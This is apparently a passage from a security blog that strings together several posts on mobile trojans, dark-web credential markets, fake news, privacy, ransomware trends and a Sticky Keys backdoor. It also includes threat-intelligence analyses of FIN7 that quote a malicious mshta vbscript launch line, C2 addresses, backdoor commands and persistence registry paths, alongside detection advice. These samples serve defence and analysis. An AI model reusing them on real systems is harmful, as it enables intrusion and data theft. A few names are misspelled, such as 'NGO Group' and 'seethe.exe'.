It should be noted that Adobe Flash player has been discontinued after Android 4.1 version as the player comes integrated with the mobile browser itself. There is no official Adobe Flash Player available on the Google Play Store. Adobe had also announced that it will stop updating and distributing Flash player by the end of 2020 in all formats of the browser.

To stay safe from this trojan, users should take care to download only verified apps and avoid third-party apps or links provided in SMS or emails. Users should also keep the “Unknown Sources” option disabled in the settings (Settings > Security > Unknown Sources).

Additionally, users are advised to install a trusted mobile security app that can detect and block fake and malicious apps before they can infect their device.

It is also strongly advised to always keep the device OS and mobile security apps up-to-date as per official instructions.

" Narcos " helping users to potentially curb Cybercrime




The dark web isn't only a market for illicit drugs and stolen Visa or credit card numbers but rising underneath the surface of this already uncertain market place is a growing economy flourishing on stolen identities.

There is a developing interest for favoured user logins on the dark web, and the outcomes could indeed have devastating consequences for organizations and businesses around the world.
It is as comparative as the famous Netflix original series "Narcos" which recounts the story of former drug chieftain Pablo Escobar, who in his prime made as much profit trafficking cocaine in a year than the entire total national output of Colombia. And keeping in mind that there were many components and factors that prompted and later led to the rise of Escobar, the most critical was the developing worldwide demand.

Amidst all this a simple formula is followed from consumer credit card logins to iOS administrator credentials.

The more access someone has to a system, the more valuable their identity is on the dark web.

Experts estimate that stunning revenue of $800,000 a day by AlphaBay, which was taken down in July, demonstrates that the money made on the black market can overshadow what many best and no doubt the top security organizations—who are in charge of protecting these identities—acquire every year.

Today almost 80 per cent of all cyber security breaches involve privileged login credentials according to Forrester Research.

In the wrong hands those privileged logins can wreak destruction and havoc on a business either through an arranged inward attack or by closing a framework (system) down for ransom.
In a current illustration featured in a report from BAE systems and PwC, a group called APT10 focused solely on the privileged credentials of managed IT service co-ops (MSPs) that further permitted the hacker unprecedented potential access to the intellectual property and sensitive information of those MSPs and their customers all around.

The dark web is lucrative to the point that anybody with software engineering abilities and a wayward good compass can endeavour to trade out; therefore one cannot avoid and ward off every 
attempt to break into their system.

Understanding and realising that, we must ensure that no user has full, uncontrolled and unregulated access to our networks and systems. As it turns out to be certain that the most ideal approach to avert hackers, hoping to offer your privileged credentials on the dark web is to debase them however much as could be expected.

To bring this back around to "Narcos," if cocaine clients amid Escobar's rule as a narco-trafficker all of a sudden ended up being noticeably invulnerable to the forces of the  drug, the market demand—and the fortune Pablo Escobar was hoarding—would have long dried up.


 Similarly on the off chance that we could check the straightforwardness or the ease at which culprits can utilize privileged credentials we can possibly control the cybercrime. The same is valid for offering and selling credentials and certifications alike, on the dark web.


STOP FAKE NEWS – PAUSE, EVALUATE and FORWARD


The potential for fake news to turn viral using social media is quite real. There have been several instances where rumors have incited mob violence between rival communities. The consequence got out of hand when illiterate tribals in a remote Indian district received a Whatsapp message which claimed that children could be kidnapped by a gang and their body parts sold. The message went viral in these villages and mobs of upto 500 people pounced on strangers who they suspected to the child kidnappers, in all there were two incidents where 7 people were lynched.
It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media allows every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interest such as political distortion, defamation, mischief, inciting trouble and to settle personal problems.

 As aptly illustrated in the case above, when fake news goes viral the ill effects escalate to a point where they can cause physical damage, loss of life or long-term animosity between sections of society. Purposely-crafted fake/distorted news introduced over periods of time by vested interests can distort perspectives and social harmony. Such news is effectively used for ideological indoctrination.

Creation of fake news is extremely simple. Listed below are six commonly used methods

·         Individuals concoct their own stories

·         Marketers release competitive advertisements based on unproven data

·         Groups with vested interests manipulate the volume and narrative of news.

·         Photographs are morphed

·         Old photographs are used to depict recent events

·         Real photographs are used to defame

Obviously, it is also quite easy to catch the perpetrator. A few years back, a twitter hoax was dealt with by a strong reprimand, but not today. Fake news, hoaxes, rumours or any other type of content that results in incitement or defamation attract stronger penalties and jail terms. Police are more aware and vigilant.
Most cybercitizens unwitting help fake news go viral by recirculating it. It creates a sense of belief that it must be true because the other person must have validated the news before sending it.

Pause before forwarding, Evaluate veracity and then Forward. Do not be that link in the chain responsible for the circulation of Fake News
Cybercitizens, do take care when crafting messages on social media – a little mischief may provide you a few years in government paid accommodation – Jail. Advise your children to be responsible and do cross check news received over social media before recirculating or believing in it.

What is Data Privacy and why is it an important issue?

The question of whether privacy is a fundamental right is being argued before the honorable Supreme Court of India. It is a topic to which a young India is waking up too. Privacy is often equated with Liberty, and young Indians wants adequate protection to express themselves.

Privacy according to Wikipedia is the ability of an individual or group to seclude themselves, or information about themselves, and thereby express themselves selectively. There is little contention over the fact that privacy is an essential element of Liberty and the voluntary disclosure of private information is both part of human relationships and a digitized economy.

The reason for debating data privacy is due to the inherent potential for surveillance and disclosure of electronic records which constitute privacy such as sexual orientation, medical records, credit card information, and email.

Disclosure could take place due to wrongful use and distribution of the data such as for marketing, surveillance by governments or outright data theft by cyber criminals. In each case, a cybercitizens right to disclosure specific information to specific companies or people, for a specific purpose is violated.

Citizens in western countries are legally protected through data protection regulation. There are eight principles designed to prevent unauthorized use of personal data by government, organizations and individuals

Lawfulness, Fairness & Transparency
Personal data need to be processed based on the consent given by data subjects. Companies have an obligation to tell data subjects what their personal data will be used for. Data acquired cannot be sold to other entities say marketers.
Purpose limitation
Personal data collected for one purpose should not be used for a different purpose. If data was collected to deliver an insurance service, it cannot be used to market a different product.
Data minimization
Organizations should restrict collection of personal data to only those attributes needed to achieve the purpose for which consent from the data subject has been received.
Accuracy
Data has to be collected, processed and used in a manner which ensures that it is accurate. A data subject has to right to inspect and even alter the data.
Storage limitation
Personal data should be collected for a specific purpose and not be retained for longer than necessary in relation to this purposes.
Integrity and confidentiality
Organizations that collect this data are responsible for its security against data thefts and data entry/processing errors that may alter the integrity of data.
Accountability
Organizations are accountable for the data in their possession
Cross Border Personal information
Requirements.
Personal information must be processed and stored  in secured environment which must be ensured if the data is processed outside the border of the country

It is important for cybercitizens to understand their privacy rights particularly in context of information that can be misused for financial gain or to cause reputational damage.




The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report

q1 headline image - blog

Developments in Cyber-crime, Cyberwarfare and AI mark the first quarter of 2017, as indicated by PandaLabs Q1 Report. The Report by Panda Security’s malware resource facility identifies prominent tactics, attack methods and shifts in the industry.

The Cyber-crime industry continues to grow on the back of profitable attacks. The development of Ransomware-as-a-Service (RaaS) and organisations like Vdos, an organisation specialising in DDos attacks, indicate the professionalism of the cyber-crime industry. In Q1 we continue to see new and adapted attack methods such as RDPatcher, malware detected by PandaLabs in its attempt to access the victim’s endpoint and prepare it for rental on the Dark Web.

Politically motivated cyber-attacks

Fueling the continued development of the cyber-crime industry are politically motivated cyber-attacks. In recent months, Cyberwarfare has become a popular tactic in enforcing political agendas. In Q4 of 2016, we saw some of the first high profile instances of cyberwarfare, with accusations of Russia’s interference in the 2016 US elections. The gravity the development is clear as countries like Germany have now begun to develop cyber-command centres to monitor online activity – this quarter France and the Netherlands reconsidered electronic voting procedures to avoid situations like the 2016 US elections.

Targeted IoT device attacks

Targeted attacks on IoT devices continue to threaten our safety in line with the ever-increasing number of IoT devices. In February, at the European Broadcasting Union Media Cyber Security Seminar, security consultant Rafael Scheel demonstrated more ways these devices can breach unsecured networks by creating an exploit that would allow an attacker to take control of a Smart TV using only a DDT signal.

A perfect device for eavesdropping

Recent developments in Robotics and AI have led to that belief that the fourth industrial revolution is not far off. Robotics and AI technology could do more than just take over jobs – introducing virtual assistants like Google Home and Amazon Echo, can become a dangerous in road for hackers. Introduced in February 2017, Google Home can tune into your home IoT devices while waiting to be called on – making it the perfect device for eavesdropping. Police recently requested access to an Amazon Echo device as it may have held evidence that could be useful to their case.

Over the course of 2016 Ransomware attacks earned criminals billions of Rand. Fueled by its profitability, Ransomware attacks continue to increase, with new variants created daily. In Q1 PandaLabs discovered Ransomware variant WYSEWYE -that allows the attacker to select and take control of specific folders on the victim’s endpoint, ultimately demanding a ransom to give back control to the victim.

See the full report by PandaLabs here.

The post The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report appeared first on CyberSafety.co.za.

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Services Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077” was interesting because this KB number was not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process

Detection

Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries
  • processList: Send list of process running
  • screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VB script
  • runexe: Executes EXE file
  • runps1: Executes PowerShell script
  • delete: Delete the specified file
  • update: Update the specified file

All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code:

Function send_data(data)
                random_string = custom_function_to_generate_random_string()
                encoded_data = URLEncode(SimpleEncrypt(data))
                post_data("POST”, random_string & "=" & encoded_data, Hard_coded_c2_url,
Create_Random_Url(class_id))

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

A User-Friendly Interface for Cyber-criminals

IMG-MC-wysiwye

Installing malware through Remote Desktop Protocol is a popular attack method used by many cyber-criminals. over the past few months Panda Security’s research facility PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through brute a force attack on the RDP, the cyber-criminals gain access to the company. Attackers simply execute the corresponding malware automatically to start the encryption.

wysiwye-530x483Recently however, PandaLabs has noticed more personalised attacks. Analysing this intrusion we see that the ransomware comes with its own interface, through which its can be configured according to the attackers preferences. Starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to action on.

Advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360 guarantees better protections against new age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on CyberSafety.co.za.

Hackers Spark Revival of Sticky Keys Attacks

password

Hackers are constantly trying to find new ways to bypass cyber-security efforts, sometimes turning to older, almost forgotten methods to gain access to valuable data. Researchers at PandaLabs, Panda Security’s anti-malware research facility, recently detected a targeted attack which did not use malware, but rather used scripts and other tools associated with the operating system itself in order to bypass scanners.

Using an attack method that has gained popularity recently, the hacker launch a brute-force attack against the server with the Remote Desktop Protocol (RDP) enabled. Once they have access to the log-in credentials of a device, the intruders gain complete access to it.
At this stage, the attackers run the seethe.exe file with the parameter 211 from the computers’ Command Prompt window (CMD) – turning on the ‘Sticky Keys’ feature.

1-1

Next, the hacker initiates Traffic Spirit – a traffic generator application that ensure the attack is lucrative for the cyber-criminals.

2

Once this is complete, a self-extracting file is launched that uncompresses the following files in the %Windows%\cmdacoBin folder:
• registery.reg
• SCracker.bat
• sys.bat

The hacker then runs the Windows registry editor (Regedit.exe) to add the following key contained in the registery.reg file:

3

This key aims at ensuring that every time the Sticky Keys feature is used (sethc.exe), a file called SCracker.bat is run. This is a batch file that implements a very simple authentication system. Running the file displays the following window:

4

The user name and password are obtained from two variables included in the sys.bat file:

5

This creates a backdoor into the device through which the hacker gains access. Using the backdoor, the hacker is able to connect to the targeted computer without having to enter the login credentials, enable the Sticky Keys feature, or enter the relevant user name and password to open a command shell:

6

The command shell shortcuts allow the hacker to access certain directories, change the console colour, and make use of other typical command-line actions.

7

The attack doesn’t stop there. In their attempt to capitalise on the attack, a Bitcoin miner is installed, to take advantage of every compromised computer. This software aims to use the victims’ computer resources to generate the virtual currency without them realising it.
Even if the victim realises their device has been breached and changes their credentials – the hacker is still able to gain access to the system. To enable Sticky Keys, the hacker enter the SHIFT key five times, allowing the cyber-criminal to activate the backdoor one again.

Adaptive Defense 360, Panda Security’s advanced cyber-security solution, was capable of stopping this targeted attack thanks to the continuous monitoring of the company’s IT network, saving the organisation from serious financial and reputational harm. Business leaders need to recognise the need for advanced security, such as AD360, to protect their network from these kinds of attacks.

The post Hackers Spark Revival of Sticky Keys Attacks appeared first on CyberSafety.co.za.

Cyber Security Predictions for 2017

Pandalabs-summer16

Analysis

2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black Hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect a large number of computers possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.


Ranking the top attacks of 2016

art-blog


Ransomware

We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of system tool PowerShell has risen this year, installed by default in Windows 10 and frequently used in attacks to avoid detection by security solutions installed on victims computers.

In Q2 of 2016, one of the strangest cases of Ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that they were poised to launch ransomware on all of their computers. If the company didn’t pay around €9000 in Bitcoins within 3 days. To prove that they did in fact have access to the organisations network, the hackers sent a file with a list of every device connected to the company’s internal network.

Ransomware as a Service (RaaS) presented as the latest development in the Ransomware industry. In Q3 we witnessed to a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, specialised in the development aspect of malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part they leave it up to the distributors to be in charge of infecting their victims. Much like in the legal world, the distributors’ profit is derived from a percentage of the money acquired. The higher the sales, the higher the percentage that they receive.


Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.

smartphones-blog


Mobile Devices

SNAP is one the most popular vulnerabilities that we’ve seen this year – affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which gives permission for the running of any JavaScript. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update of version 9.3.5 of iOS. This version resolves three zero-day vulnerabilities employed by a software spy known as Pegasus, developed by the NGO Group, an Israeli organization with products similar to those offered by Hacking Team.


Internet of Things

Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack – researchers Andrew Tierney and Ken Munro showed a proof of concept that they built to hijack a thermostat. After taking control of the thermostat (inserting an SD card in it), he raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, giving the MAC address of as an identifier of every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.

cybersecurity3


Cyberwarfare

2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


Cybercrime

In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

One of the biggest attacks to date affected Yahoo – despite having taken place in 2014 the attack only become known recently. A total of 500 million accounts were compromised, becoming the greatest theft in history.

In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.


DDoS Attacks

In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had lead 150,000 attacks and made a profit of $618,000, were arrested.

In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

In the last quarter of the year, a wave of large-scale cyberattacks against the American internet provider DynDNS disrupted the service of some major global corporations’ websites. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.

pandasecurity-punkeyPOS-principal1


POS’s and Credit Cards

The popular American fast food chain Wendy’s saw the Points of Sale terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS’s had been infected with the malware PosCardStealer.


Financial Institutions

This year, the Central Bank of Bangladesh suffered an attack in which 1 billion US dollars in bank transfers were made. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.

blog


Social Networks

The security of 117 million LinkedIn users was at risk after a list of email address and their respective passwords were published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been aquired from their servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were attained by means of phishing or Trojans.

This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, reaching up to 360 million affected accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords, and aren’t using two-factor authentication they could be at risk.

Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

